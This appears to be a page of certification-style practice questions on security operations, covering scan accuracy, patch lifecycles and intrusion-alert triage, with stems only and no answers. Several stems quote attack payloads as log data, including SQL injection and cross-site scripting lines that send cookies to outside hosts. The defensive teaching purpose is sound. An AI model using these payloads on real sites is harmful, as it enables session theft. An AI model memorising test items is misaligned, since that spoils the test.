Security Operations
627 questions
An enterprise security analyst discovers that recent vulnerability scan reports flag several Linux production servers as critical due to missing OS security updates. However, the system administration team provides logs showing that the vendor patches were installed two weeks ago. Further investigation reveals the scanner performed an unauthenticated remote scan relying solely on service banners exposed over open network ports. Which of the following actions should the analyst take to ensure the vulnerability scan accurately reflects the true patch status of the servers?
A security administrator is managing the remediation of a critical zero-day vulnerability affecting enterprise database servers. To ensure business continuity and adhere to organizational risk management policies, the administrator must execute the patch management lifecycle in a structured sequence. Arrange the operational steps below in the correct order from first to last.
Drag items to arrange them in the correct order
A security operations team is triaging high-priority alerts generated by a Network Intrusion Detection System (NIDS) placed between an enterprise web tier and an internal database subnet. The NIDS logs show multiple HTTP requests containing payload strings such as `UNION SELECT username, password_hash FROM user_credentials--`. Which of the following statements correctly interpret this network security monitoring alert and identify an appropriate remediation control? (Select TWO.)
Select all that apply
An organization must conduct scheduled external vulnerability assessments of its public-facing web applications to satisfy regulatory compliance. During previous unauthenticated scans, the perimeter web application firewall (WAF) repeatedly blocked the scanner's IP address, resulting in incomplete scan reports and false positives. Which scanning strategy should the security analyst implement to obtain comprehensive assessment results without disabling perimeter defenses for external traffic?
A security operations team is implementing an automated system for endpoint security baseline auditing and patch management across a hybrid enterprise environment. Which of the following operational practices should the security team deploy to maintain system stability while enforcing secure configuration baselines? (Select TWO.)
Select all that apply
A security analyst investigates a SIEM alert triggered by a Network Traffic Analysis (NTA) sensor monitoring an internal enterprise workstation subnet. The flow log snippet displays the following sequential network events:
Timestamp: 2026-07-27T14:02:11Z | SrcIP: 10.0.4.15 | DstIP: 192.168.1.50 | DstPort: 445 | Protocol: TCP | Flags: SYN
Timestamp: 2026-07-27T14:02:11Z | SrcIP: 10.0.4.15 | DstIP: 192.168.1.51 | DstPort: 445 | Protocol: TCP | Flags: SYN
Timestamp: 2026-07-27T14:02:11Z | SrcIP: 10.0.4.15 | DstIP: 192.168.1.52 | DstPort: 445 | Protocol: TCP | Flags: SYN
Timestamp: 2026-07-27T14:02:12Z | SrcIP: 10.0.4.15 | DstIP: 192.168.1.53 | DstPort: 445 | Protocol: TCP | Flags: SYN
Based on the network security monitoring logs, which of the following actions should the analyst take first to address this threat?
A security operations team is establishing a standardized patch management workflow to ensure system security while minimizing operational disruption across the enterprise. Place the steps of the enterprise patch management lifecycle in the correct procedural sequence from initial identification to post-implementation audit.
Drag items to arrange them in the correct order
A security engineer is planning a vulnerability assessment for an enterprise network segment containing legacy operational technology (OT) devices. These endpoints are highly sensitive to network traffic volume and frequently crash when subjected to active service probing or rapid port sweeps. The engineer must obtain a detailed inventory of missing security patches and system misconfigurations without causing service outages or operational downtime. Which of the following approaches should the engineer implement?
A security operations manager is updating operational procedures for vulnerability assessments across an enterprise network. Match each assessment methodology with the scenario where it is most appropriately applied.
Click a left item, then click its matching right item
Items
Matches
An enterprise security analyst discovers that routine software vendor patches regularly overwrite customized security hardening settings on production Linux servers, resetting critical system configurations to insecure defaults. Which of the following patch and configuration management solutions best prevents configuration drift while ensuring ongoing security baseline compliance after patch deployment?
While analyzing alerts from a network intrusion detection system (NIDS) monitoring outbound perimeter traffic, a security administrator notices an alert flagged as a high-severity SQL injection payload against an enterprise web application server. The packet log payload reads:
`GET /comment.php?id=101&data=<script>document.location='http://192.0.2.55/collect?cookie='+document.cookie</script> HTTP/1.1`
Which of the following represents the most accurate evaluation of this network alert?
A Security Operations Center (SOC) receives an automated alert generated by a Network Intrusion Prevention System (NIPS) detecting an remote code execution (RCE) payload targeted at an internal API server. In what chronological sequence should a security analyst perform the initial response actions from alert ingestion through recovery?
Drag items to arrange them in the correct order
A security team is experiencing severe performance degradation on production database servers whenever network-based vulnerability scans occur. The team must maintain comprehensive vulnerability visibility while eliminating operational disruption to high-traffic database services. Which of the following strategies should the security team implement to resolve this issue? (Select TWO.)
Select all that apply
An enterprise application runs in a cloud environment using containerized microservices operating under an immutable infrastructure deployment model. A vulnerability scan detects a critical remote code execution vulnerability within a software library contained inside several active production containers. Which of the following patch and configuration management practices should the security team perform to resolve the vulnerability?
An enterprise Security Operations Center (SOC) analyst is reviewing network security monitoring alerts and NetFlow records for an internal workstation. The monitoring tools report suspicious outbound protocol activity originating from the host. Which of the following network security monitoring findings specifically indicate that DNS tunneling is being utilized for data exfiltration? (Select TWO).
Select all that apply
A security analyst is triaging alerts from a Network Intrusion Detection System (NIDS) monitoring incoming web traffic to an internal app server. The NIDS sensor triggered an automated alert categorized as 'Database Manipulation Attempt' after capturing the following HTTP request payload:
`GET /catalog/product.php?id=%3Cscript%3Efetch%28%27http%3A%2F%2Fattacker.com%2Fsteal%3Fcookie%3D%27%2Bdocument.cookie%29%3C%2Fscript%3E HTTP/1.1`
`Host: store.internal.net`
Upon reviewing the log payload, which of the following correctly identifies the actual threat vector present in the capture and the most appropriate remediation measure?
A security analyst managing legacy workstation endpoints in a healthcare facility needs to remediate a critical operating system vulnerability. Vendor patches frequently reset customized local security policies back to default settings, exposing the devices to unauthorized access. Which of the following approaches best maintains system security baselines while ensuring timely vulnerability remediation?
A security analyst is establishing a comprehensive vulnerability scanning framework for an enterprise network containing diverse operational environments. Match each vulnerability assessment requirement on the left with the scanner deployment methodology or configuration option on the right that best satisfies it.
Click a left item, then click its matching right item
Items
Matches
A Security Operations Center (SOC) analyst receives a high-priority alert from a Network Intrusion Detection System (NIDS) indicating suspicious outbound traffic from an internal enterprise workstation. Place the following analyst triage and incident response steps in the correct sequence, from initial alert evaluation to containment.
Drag items to arrange them in the correct order
A security operations team is responding to a newly disclosed critical remote code execution vulnerability impacting enterprise database servers. To ensure operational stability while mitigating risk, what is the correct chronological sequence of steps the team should perform during this emergency patch deployment workflow?
Drag items to arrange them in the correct order